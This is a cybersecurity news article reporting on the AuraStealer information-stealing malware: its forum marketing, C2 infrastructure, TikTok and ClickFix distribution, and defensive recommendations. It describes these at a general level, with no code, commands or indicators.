AuraStealer, a new potent information-stealing malware, has been causing significant disturbances in the cybersecurity realm since mid-2025. This malicious software, developed and maintained by a group of Russian-speaking hackers, was initially introduced on underground forums following the disruption of the Lumma stealer infrastructure.
Emergence and Promotion of AuraStealer
First appearing on the XSS forum in July 2025 under the alias ‘AuraCorp,’ AuraStealer was marketed as a direct rival to LummaC2. The malware was promoted with a detailed post outlining its features and subscription model. Subsequently, it was advertised on multiple forums, expanding its presence across various platforms including Exploit and Darkmarket.
The developers claim that AuraStealer can extract data from over 110 browsers, more than 70 applications, and over 250 browser extensions, highlighting its extensive threat potential. This broad-reaching capability is a significant concern for cybersecurity experts.
Command-and-Control Infrastructure
Intrinsec analysts have identified that AuraStealer operates using an elaborate command-and-control (C2) framework. They discovered 48 C2 domains linked to its operations, with the threat actors utilizing cost-effective .SHOP and .CFD domains. To obscure their infrastructure, all traffic is routed through Cloudflare, complicating efforts to trace the true server locations.
Recent analyses indicate a shift from .SHOP to .CFD domains, suggesting an evolving operation. The malware’s management panel offers comprehensive features for subscribers, including campaign management tools and Telegram bot integration.
Distribution Methods and Security Recommendations
AuraStealer predominantly exploits social engineering tactics, such as the ClickFix technique. Noteworthy campaigns in October 2025 involved malicious TikTok videos masquerading as software activation tutorials, effectively tricking users into executing harmful commands via PowerShell.
In addition to TikTok lures, the malware is disseminated through various loaders and downloaders. Techniques include injecting AuraStealer into legitimate Windows processes and using tools like Visual Basic scripts and Donut shellcode loaders. Efficient security measures involve blocking unauthorized PowerShell execution and detecting process injection attempts.
To mitigate the risks posed by AuraStealer, organizations should block the known C2 domains and provide training to help employees recognize social engineering attacks. Implementing application allow-listing and restricting administrative access can further protect against potential infections.
For continued updates on cybersecurity threats, follow us on Google News, LinkedIn, and X, and set CSN as a preferred source in Google.
